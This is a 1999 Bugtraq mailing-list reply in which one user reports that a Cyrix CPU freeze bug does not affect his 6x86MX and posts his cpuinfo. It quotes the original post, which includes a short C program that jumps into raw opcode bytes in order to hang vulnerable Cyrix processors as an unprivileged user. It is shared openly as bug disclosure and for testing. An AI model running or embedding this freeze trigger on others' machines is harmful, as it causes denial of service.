Bugtraq mailing list archives

Re: Cyrix bug: freeze in hell, badboy

From: aaronl () VITELUS COM (Aaron Lehmann)
Date: Sat, 6 Feb 1999 01:44:01 +0000


This does not seem to affect my Cyrix 6x86MX/233. In single user mode, it
just hung until I ^C'd it. Running Linux 2.2.1

/proc/cpuinfo:

processor       : 0
vendor_id       : CyrixInstead
cpu family      : 6
model           : 2
model name      : 6x86MX 2.5x Core/Bus Clock
stepping        : 7
cpu_mhz         : 187.399276
fdiv            : no
hlt             : no
sep             : no
f00f            : no
fpu             : yes
fpu_exception   : yes
cpuid level     : 1
wp              : yes
flags           : fpu de tsc msr cx8 pge cmov mmx
bogomips        : 186.78


KeyID 1024D/73348CA0
Fingerprint 8EFC 7F10 F26C 55A8 458A  38B0 890F 384F 7334 8CA0
Public key available at http://www.vitelus.com/aaronl/pubkey.asc

On Thu, 4 Feb 1999, Ragnar Hojland Espinosa wrote:

I emailed Cyrix a few months ago, and even managed to get a "oh, we will
look at it" thanks to Rafael Reilova, but that was it till today.  A
couple of people did report it, effectively, froze (most of) their Cyrix
CPUs while running the opcodes below as non priviledged user.

While I don't have the enough knowledge to assure this _is_ a CPU bug, it
certainly looks like one to me (NO_LOCK isn't a workaround, btw).

0x804a368 <the_data>:   cwtl
0x804a36a <the_data+2>: orl    $0xe6ebe020,%eax
0x804a36f <the_data+7>: jle    0x804a368 <the_data>

Here is the code (tested with linux, any version):

/* Please compile without optimizations */
unsigned char the_data[] = { 62, 152, 13, 32, 224, 235, 230, 126, 247 };

void (*badboy)();
int main (int argc, char **argv)
{
   badboy = (void(*)())(the_data);
   asm ("movl badboy,%eax");
   asm ("call *%eax");

   return 0;
}

If you try it, please send me your /proc/{cpuinfo,version} and if it
freezes or not.
--
____/|  Ragnar Hojland  (ragnar () lightside ddns org)      Fingerprint  94C4B
\ o.O|                                                   2F0D27DE025BE2302C
 =(_)=  "Thou shalt not follow the NULL pointer for      104B78C56 B72F0822
   U     chaos and madness await thee at its end."       hkp://keys.pgp.com

Current thread:

Linux /usr/bin/lpc overflow xnec () INFERNO TUSCULUM EDU (Feb 02)
- <Possible follow-ups>
- Re: Linux /usr/bin/lpc overflow Denis Bucher (Feb 03)
  - Cyrix bug: freeze in hell, badboy Ragnar Hojland Espinosa (Feb 04)
    - Re: Cyrix bug: freeze in hell, badboy Aaron Lehmann (Feb 05)
  - Re: Linux /usr/bin/lpc overflow Simon Karpen (Feb 04)
- Re: Linux /usr/bin/lpc overflow -*- Chotaire -*- (Feb 04)